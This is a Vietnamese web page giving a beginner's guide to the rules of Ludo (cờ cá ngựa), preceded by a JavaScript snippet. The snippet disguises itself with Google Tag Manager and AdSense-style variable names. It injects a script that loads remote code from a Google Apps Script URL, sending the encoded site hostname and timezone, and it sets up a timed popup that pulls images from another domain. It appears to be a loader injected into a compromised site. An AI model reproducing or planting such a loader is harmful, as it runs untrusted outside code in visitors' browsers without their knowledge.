var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Gợi ý hướng dẫn chơi cờ cá ngựa hot nhất hiện nay 2023

Với trò chơi Cờ cá ngựa, bạn chỉ cần đọc một lần cách chơi Cờ cá ngựa là bạn có thể chơi dễ dàng, có khi cho ngựa về chuồng nhanh chóng hơn 3 người chơi còn lại. Để bạn hiểu được luật chơi, cách chơi thì các bạn cùng tham khảo bài viết sau đây.

cach choi co ca ngua hay

Hướng dẫn chơi cờ cá ngựa hay

Cách chơi cờ cá ngựa cho người mới

1. Luật chơi Cờ cá ngựa

– Tiêu chuẩn của bộ Cờ cá ngựa: Chia thành 4 phần với 4 màu khác nhau gồm có màu xanh lá cây, xanh dương, đỏ và vàng, bốn viên xúc xắc và 16 quân cờ cá ngựa chia tay 4 nhóm với 4 màu khác nhau (giống với màu trên bàn cờ cá ngựa)

– Số lượng người chơi: Tối thiểu là 2 và tối đa là 4

– Có thể bốc thăm, oẳn tù tì … để chọn ra người chơi trước. Và lần lượt theo thứ tự ngược kim đồng hồ. Người chơi trước sẽ tung viên xúc xắc ra. Nếu mặt xúc xắc hiện lên từ 1 cho tới 5 thì người chơi đó không được cho ngựa xuất chuồng. Còn nếu mặt xúc xắc hiện lên là 6 thì ngựa mới được xuất chuồng. Và khi mặt xúc xắc là 6 thì người chơi đó có quyền xúc xắc lần nữa để đi. Khi di chuyển thì bạn sẽ gặp các vấn đề như sau:

+ Bị cản: Ở trên đường đi của bạn có quân của đối thủ đang cản bạn. Để vượt qua được đối thủ thì mặt xúc xắc hiện ra phải lớn hơn bước đi giữa 2 quân.+ Đá: Ở trên đường đi của bạn có quân của đối thủ. Nếu như bạn tung xúc xắc hiện mặt bằng với khoảng cách giữa ngựa của bạn và ngựa của đối thủ thì bạn sẽ đá ngựa của đối thủ. Nếu như bạn không muốn đá thì bạn đi quân khác.+ Điều kiện chiến thắng: Người nào cho 4 ngựa vào chuồng đứng ở vị trí thứ 6, 5, 4, 3 đầu tiên thì người đó sẽ chiến thắng. Và lần lượt như thế sẽ xếp thứ nhì, thứ 3 và bét.

2. Tìm hiểu bài cờ Cá ngựa

cach choi co ca ngua hay 2

Bàn cờ cá ngựa

Bàn cờ cá ngựa là hình vuông, có 4 màu tương ứng cho 4 người chơi. Mỗi người chơi sẽ có các vùng riêng như:

– Vùng Thảo nguyên: Nơi mà ngựa tự do chơi, đặt chú ngựa khi chưa tham gia vào trò chơi- Vị trí xuất phát: Là nơi chú ngựa có bước đi đầu tiên khi chú ngựa từ vùng Thảo nguyên ra.- Chuồng: Hình chữ nhật, gồm ô đánh số từ 1 đến 6.

3. Cách chơi Cờ cá ngựa

* Thiết lập ban đầu

– Trước khi bắt đầu chơi thì mỗi người chọn cho mình 4 con cá ngựa có màu giống nhau và đặt trong vô thảo nguyên có màu phù hợp.- Chọn người chơi đầu tiên và chơi theo lần lượt.

* Cách chơi

Người chơi đầu tiên sẽ tung xúc xắc. Khi đến lượt bạn, bạn sẽ tung xúc xắc. Khi xúc xắc đổ xuống xuất hiện mặt chấm ngửa lên. Mặt chấm này sẽ quyết định bước đi của quân cá ngựa của bạn.

– Xuất 1 quân cờ: Khi người chơi tung xúc xắc và lật mặt 6 điểm thì người chơi mới được xuất quân. Lúc đó, đặt một con cá ngựa vào vị trí Bắt đầu. Lúc này, người chơi đó tiếp tục được tung xúc xắc tiếp để đi. Nếu được mặt 6 chấm thì bạn tiếp tục tung tiếp và đi tiếp hoặc chọn xuất quân. Nếu như mặt xúc xắc hiện ra không phải là 6 chấm thì đi ngựa theo đúng số mặt chấm, như mặt xúc xắc là 4 thì đi ngựa 4 ô, xong chuyển lượt cho người tiếp theo.

– Di chuyển quân: Số chấm trên xúc xắc là số ô mà quân cờ đi. Chẳng hạn mặt xúc xắc hiện ra là 5 thì quân cờ cá ngựa đó sẽ di chuyển 5 bước (5 ô). Hướng đi của quân cờ cá ngựa cũng là ngược chiều kim đồng hồ. Đặc biệt, nếu như bạn tung xúc xắc và lật mặt 1 chấm mà quân cờ của bạn đang ở vị trí tới vị trí cửa chuồng kế tiếp ở trên đường đang đi không có quân cờ nào cản thì bạn cho ngựa bay thẳng đến chân chuồng. Còn nếu như bạn xúc xắc hơn 1 thì bạn sớm đưa hết con cá ngựa về chuồn.

Lưu ý: Khi tung được 6 thì bạn có thể lựa chọn xuất quân hoặc đi tiếp quân ở trên bàn cờ và được tung xúc xắc thêm lần nữa.

* Về/vào chuồng

Khi quân cờ bạn đã đi hết 1 vòng trên bàn cờ và đến Cửa chuồng. Ở đây thì quân của đối thủ vẫn có thể đá quân của bạn. Do đó, bạn cần cân nhắc kỹ lưỡng để quân của mình không bị đá.

Khi quân cờ bạn tới cửa chuồng, bạn tung xúc xắc, mặt nào hiện ra thì bạn cho quân của mình vào ô số đó. Chẳng hạn, xúc xắc lật mặt 4 thì bạn cho quân vào ô 4. Còn nếu như vào ô 4 rồi, bạn sẽ phải leo dần, chứ không được nhảy cóc. Như quân ở ô 3 thì bạn cần phải xúc xắc vào ô 4, 5 và 6 để leo dần.

Game cờ cá ngựa được tải nhiều nhất– Ludo King- Ludo Club- Ludo Star- Ludo SuperStar- Ludo Classic

Hướng dẫn chơi cờ cá ngựa

Trò chơi Cờ cá ngựa không hoàn toàn là trò may rủi như bạn nghĩ mà trò này cũng đòi hỏi sự tính toán của người chơi. Khi bạn nắm được cách chơi Cờ cá ngựa, chơi quen, thì bạn dễ dàng trở thành cao thủ chơi Cờ cá ngựa, có nhiều bí quyết để chơi thắng.

https://thuthuat.taimienphi.vn/cach-choi-co-ca-ngua-hay-59792n.aspx Hiện nay, cờ up và cờ Shogi cũng đang được người Việt yêu thích, chơi khi rảnh rỗi. Cách chơi cờ up gần giống với cách chơi cờ tướng, tuy nhiên lúc đầu chỉ có tướng là ngựa, còn lại các quân cờ đều up. Còn cách chơi cờ Shogi lại gần giống với cờ vua, tuy nhiên chơi cờ Shogi thì bạn thể thả quân.

Xem thêm: Cách chơi cờ úp từ cơ bản tới nâng cao